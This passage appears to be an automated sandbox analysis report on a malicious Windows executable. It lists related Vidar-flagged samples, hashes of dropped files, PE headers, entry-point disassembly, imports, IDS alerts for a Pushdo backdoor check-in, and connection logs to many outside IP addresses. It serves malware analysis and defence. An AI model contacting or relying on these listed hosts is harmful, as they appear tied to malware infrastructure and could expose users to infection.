                                                                                                                                                                                                                                                        • 185.237.66.112
                                                                                                                                                                                                                                                        • 91.229.22.126
                                                                                                                                                                                                                                                        • 104.21.52.126
                                                                                                                                                                                                                                                        • 104.21.66.220
                                                                                                                                                                                                                                                        • 172.67.164.178
                                                                                                                                                                                                                                                        • 75.2.95.235
                                                                                                                                                                                                                                                        information list_patched.scrGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 172.67.156.49
                                                                                                                                                                                                                                                        • 49.212.235.175
                                                                                                                                                                                                                                                        • 94.130.146.206
                                                                                                                                                                                                                                                        • 5.189.171.125
                                                                                                                                                                                                                                                        • 185.237.66.112
                                                                                                                                                                                                                                                        • 91.229.22.126
                                                                                                                                                                                                                                                        • 104.21.52.126
                                                                                                                                                                                                                                                        • 104.21.66.220
                                                                                                                                                                                                                                                        • 172.67.164.178
                                                                                                                                                                                                                                                        • 75.2.95.235
                                                                                                                                                                                                                                                        _____.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 172.67.156.49
                                                                                                                                                                                                                                                        • 49.212.235.175
                                                                                                                                                                                                                                                        • 94.130.146.206
                                                                                                                                                                                                                                                        • 5.189.171.125
                                                                                                                                                                                                                                                        • 185.237.66.112
                                                                                                                                                                                                                                                        • 91.229.22.126
                                                                                                                                                                                                                                                        • 104.21.52.126
                                                                                                                                                                                                                                                        • 104.21.66.220
                                                                                                                                                                                                                                                        • 172.67.164.178
                                                                                                                                                                                                                                                        • 75.2.95.235
                                                                                                                                                                                                                                                        My arrival in hotel.scrGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 172.67.156.49
                                                                                                                                                                                                                                                        • 49.212.235.175
                                                                                                                                                                                                                                                        • 94.130.146.206
                                                                                                                                                                                                                                                        • 5.189.171.125
                                                                                                                                                                                                                                                        • 185.237.66.112
                                                                                                                                                                                                                                                        • 91.229.22.126
                                                                                                                                                                                                                                                        • 104.21.52.126
                                                                                                                                                                                                                                                        • 104.21.66.220
                                                                                                                                                                                                                                                        • 172.67.164.178
                                                                                                                                                                                                                                                        • 75.2.95.235
                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):46
                                                                                                                                                                                                                                                        Entropy (8bit):1.0424600748477153
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:/lbON:u
                                                                                                                                                                                                                                                        MD5:89CA7E02D8B79ED50986F098D5686EC9
                                                                                                                                                                                                                                                        SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                                                                                                                                                                                                                                        SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                                                                                                                                                                                                                                        SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                                                                        Preview:........................................user.
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                        File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):1446
                                                                                                                                                                                                                                                        Entropy (8bit):7.399414106003676
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:EtPRDylUB1Qgozm9dYIzR/MdqpexEhLFrd2QLXrB2OxUsqNZO:EtP5ylUB1QQdYIzR/ZdZ9BNUsq7O
                                                                                                                                                                                                                                                        MD5:2295C2E62BDEFBD7167835ADF110D40B
                                                                                                                                                                                                                                                        SHA1:3E60A7AB99197F659F5CE535BFBF237C82CCB4F4
                                                                                                                                                                                                                                                        SHA-256:9C8DF949C4E842809556CB6735F125B2558273908078ABDFC89AD63F5D99F28F
                                                                                                                                                                                                                                                        SHA-512:9E92168A86E32B7DE3CE68530CA2D99B1744A8F23FD74196124F3FEF185EDAB94B8C53C9FF3C0EED5506C32C5FD80202A5520AEBFF52105D836F1E19AFDA1049
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O.......q69.^.D.......k....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .........e....k....UD1"q.z..VK..b_............ ..........+).`...hiZ.. ?wkL.hz.#.....JXm..'.....|`.|8..r..^'..d.H{...8.U#....C]luX...KL..I.w......'.._O'.CM.....:...Va?~.T...q+C......>R.U0.M._\..Y....Mi[u&..Kkm?...R.f.O.*\=.M.Bm[.At...4H........M..RI.:.j....+2-.. ...z.(b:u.hi.n.....q.7...?./......)..1$....>e...Z...3..CT...?..f...x....O.... bc.-#..._... ........../(])..Q,Q.'.......t.k...!v.vg.FQpU.'.=....rHd..7.....j)..i.L...?.....y..Q.a.N7MN7.._e.r....H*y.....+..9.n...,...M..].."....".]wF.....^.K0.....P...\.....!/\..=M"1*.....k...2.T.a...K.1..._q..!..o....@-....2q....h?..d..X....:.....DW.... .Yh...LU.F.L.);.....,^.v.Sn.5x.;...3..?jNZ....'{
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):295424
                                                                                                                                                                                                                                                        Entropy (8bit):6.504754957536773
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:0TdnGHRauGW2XzY8rQbmmmmmmm6n9BLNk3Bd0AlSabtwZ:idGgTKvzLz4
                                                                                                                                                                                                                                                        MD5:F96C1D0ACCEC84AB6DDCA3C0BAFC6CBC
                                                                                                                                                                                                                                                        SHA1:CCA064FE9F5583CB11A65E8958E06106A84EC965
                                                                                                                                                                                                                                                        SHA-256:E5B9EABBF14369DF477F37F566FC590F3869D82EE9884026F7FD6ED3AECD7D1D
                                                                                                                                                                                                                                                        SHA-512:B90A19472FA3C2F23049B272E29513AAA278A648553BA96627827F740699A108F12E2EE3DCEA95F587E1BE88E1BFB8379FAC683314184744C2B61287D973FA67
                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.3...`...`...`...`...`...a...`...a...`...a...`.):`...`.)8`~..`.)9`...`.J.`...`...`Y..`...a...`..4`...`...a...`Rich...`........PE..L...E.#e.....................|......y........ ....@.......................................@.................................t...(.......................................................................@............ ..4............................text............................... ..`.rdata..Z.... ......................@..@.data...............................@....gfids...............j..............@..@.rsrc................l..............@..@.reloc...............n..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\EwK95WVtzI.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                        Entropy (8bit):6.504754957536773
                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                        File name:EwK95WVtzI.exe
                                                                                                                                                                                                                                                        File size:295'424 bytes
                                                                                                                                                                                                                                                        MD5:f96c1d0accec84ab6ddca3c0bafc6cbc
                                                                                                                                                                                                                                                        SHA1:cca064fe9f5583cb11a65e8958e06106a84ec965
                                                                                                                                                                                                                                                        SHA256:e5b9eabbf14369df477f37f566fc590f3869d82ee9884026f7fd6ed3aecd7d1d
                                                                                                                                                                                                                                                        SHA512:b90a19472fa3c2f23049b272e29513aaa278a648553ba96627827f740699a108f12e2ee3dcea95f587e1be88e1bfb8379fac683314184744c2b61287d973fa67
                                                                                                                                                                                                                                                        SSDEEP:6144:0TdnGHRauGW2XzY8rQbmmmmmmm6n9BLNk3Bd0AlSabtwZ:idGgTKvzLz4
                                                                                                                                                                                                                                                        TLSH:7D54D00470A78DB1FB658DB006EBF8B7DF3B29726A118D7B8770E36409342D1972A356
                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..3...`...`...`...`...`...a...`...a...`...a...`.):`...`.)8`~..`.)9`...`.J.`...`...`Y..`...a...`..4`...`...a...`Rich...`.......
                                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                        Entrypoint:0x40a179
                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                                                                                                        Time Stamp:0x6523C745 [Mon Oct 9 09:26:29 2023 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                        Import Hash:ad876c7addc49a2092c59c2b00afb352
                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        call 00007FDBA8D2BE33h
                                                                                                                                                                                                                                                        jmp 00007FDBA8D2B3D3h
                                                                                                                                                                                                                                                        cmp ecx, dword ptr [00447600h]
                                                                                                                                                                                                                                                        jne 00007FDBA8D2B545h
                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                        jmp 00007FDBA8D2B9E6h
                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                        and dword ptr [00447A1Ch], 00000000h
                                                                                                                                                                                                                                                        sub esp, 2Ch
                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                                                        inc ebx
                                                                                                                                                                                                                                                        or dword ptr [00447608h], ebx
                                                                                                                                                                                                                                                        push 0000000Ah
                                                                                                                                                                                                                                                        call 00007FDBA8D2CE9Bh
                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                        je 00007FDBA8D2B6BDh
                                                                                                                                                                                                                                                        and dword ptr [ebp-14h], 00000000h
                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                        or dword ptr [00447608h], 02h
                                                                                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                        mov dword ptr [00447A1Ch], ebx
                                                                                                                                                                                                                                                        lea edi, dword ptr [ebp-2Ch]
                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                        cpuid
                                                                                                                                                                                                                                                        mov esi, ebx
                                                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                                                        mov dword ptr [edi], eax
                                                                                                                                                                                                                                                        mov dword ptr [edi+04h], esi
                                                                                                                                                                                                                                                        mov dword ptr [edi+08h], ecx
                                                                                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                                                                                        mov dword ptr [edi+0Ch], edx
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-2Ch]
                                                                                                                                                                                                                                                        mov edi, dword ptr [ebp-28h]
                                                                                                                                                                                                                                                        mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                                                        xor edi, 756E6547h
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-20h]
                                                                                                                                                                                                                                                        xor eax, 49656E69h
                                                                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-24h]
                                                                                                                                                                                                                                                        xor eax, 6C65746Eh
                                                                                                                                                                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                        cpuid
                                                                                                                                                                                                                                                        mov esi, ebx
                                                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                                                        or edi, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                        lea ebx, dword ptr [ebp-2Ch]
                                                                                                                                                                                                                                                        or edi, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                        mov dword ptr [ebx], eax
                                                                                                                                                                                                                                                        mov dword ptr [ebx+04h], esi
                                                                                                                                                                                                                                                        mov dword ptr [ebx+08h], ecx
                                                                                                                                                                                                                                                        mov dword ptr [ebx+0Ch], edx
                                                                                                                                                                                                                                                        jne 00007FDBA8D2B585h
                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-2Ch]
                                                                                                                                                                                                                                                        and eax, 0FFF3FF0h
                                                                                                                                                                                                                                                        cmp eax, 000106C0h
                                                                                                                                                                                                                                                        je 00007FDBA8D2B565h
                                                                                                                                                                                                                                                        cmp eax, 00020660h
                                                                                                                                                                                                                                                        je 00007FDBA8D2B55Eh
                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2d7740x28.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x1e0.rsrc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b0000x13d0.reloc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x2cda00x1c.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2cdc00x40.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x120000x134.rdata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                        .text0x10000x10cff0x10e00False0.6067708333333334data6.6844259529201935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .rdata0x120000x1be5a0x1c000False0.8029872349330357data7.188065592253535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .data0x2e0000x1a2ac0x19800False0.38097426470588236data4.858871806504007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .gfids0x490000xac0x200False0.28515625data1.4559580411441417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .rsrc0x4a0000x1e00x200False0.53125data4.7137725829467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        .reloc0x4b0000x13d00x1400False0.8189453125data6.649367399593746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                        RT_MANIFEST0x4a0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                        KERNEL32.dllGetProcessHeap, CreateFileA, CloseHandle, GetLastError, GetCurrentDirectoryA, GetCurrentActCtx, HeapWalk, CreateThread, GetModuleFileNameA, DeleteFileA, CreateNamedPipeA, ExitProcess, VirtualAlloc, GetNamedPipeInfo, GetNamedPipeHandleStateA, MultiByteToWideChar, ExitThread, SetHandleInformation, DecodePointer, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetLastError, GetCurrentThreadId, RaiseException, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, FreeLibrary, LoadLibraryExW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetModuleHandleExW, GetStringTypeW, WideCharToMultiByte, HeapSize, HeapReAlloc, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, InitializeSListHead, RtlUnwind, GetStdHandle, WriteFile, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        34.174.61.199192.168.2.380502052037771 10/09/23-15:51:00.831982TCP2037771ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst805020534.174.61.199192.168.2.3
                                                                                                                                                                                                                                                        192.168.2.3104.21.46.14849712802016867 10/09/23-15:50:02.895814TCP2016867ET TROJAN Backdoor.Win32.Pushdo.s Checkin4971280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.728754997 CEST4971280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.728883028 CEST4971480192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.729370117 CEST4971380192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.729387999 CEST4971580192.168.2.3137.118.26.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.730099916 CEST4971680192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.850776911 CEST4971780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.895363092 CEST8049712104.21.46.148192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.895498991 CEST4971280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.895813942 CEST4971280192.168.2.3104.21.46.148
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.895823002 CEST8049713172.67.208.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.895911932 CEST4971380192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.897358894 CEST4971380192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.903724909 CEST8049714192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.903794050 CEST4971480192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.904009104 CEST4971480192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.959279060 CEST804971670.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.959440947 CEST4971680192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:02.960372925 CEST4971680192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.012602091 CEST4971880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.013724089 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.058912992 CEST8049712104.21.46.148192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.060368061 CEST8049713172.67.208.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.074085951 CEST8049713172.67.208.67192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.074453115 CEST4971380192.168.2.3172.67.208.67
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.078582048 CEST8049714192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.078975916 CEST8049714192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.079025030 CEST4971480192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.080585003 CEST804971754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.081027031 CEST4971780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.121149063 CEST4971480192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.121345043 CEST4971780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.188822985 CEST804971670.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.213758945 CEST804971670.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.214067936 CEST4971680192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.232440948 CEST4971680192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.281094074 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.281313896 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.281574965 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.296189070 CEST8049714192.124.249.20192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.296298981 CEST4971480192.168.2.3192.124.249.20
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.319705009 CEST804971880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.319926977 CEST4971880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.342374086 CEST4971880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.350752115 CEST804971754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.350781918 CEST804971754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.350918055 CEST4971780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.365076065 CEST4971780192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.381575108 CEST4972080192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.400243998 CEST4972180192.168.2.359.106.19.204
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.460472107 CEST804971670.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.460679054 CEST4971680192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.515259027 CEST4972280192.168.2.334.149.87.45
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.548233986 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552690983 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552706003 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552725077 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552738905 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552766085 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552786112 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552798986 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552836895 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552862883 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552901030 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552954912 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.552995920 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.553039074 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.553052902 CEST8049719118.27.125.181192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.553097963 CEST4971980192.168.2.3118.27.125.181
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.553766012 CEST4972380192.168.2.3104.26.6.221
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.593924046 CEST804971754.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.610968113 CEST804972054.161.222.85192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.611116886 CEST4972080192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.611429930 CEST4972080192.168.2.354.161.222.85
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.649897099 CEST804971880.93.82.33192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.650007010 CEST4971880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.666475058 CEST4971880192.168.2.380.93.82.33
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.685796022 CEST804972234.149.87.45192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:03.685883999 CEST4972280192.168.2.334.149.87.45
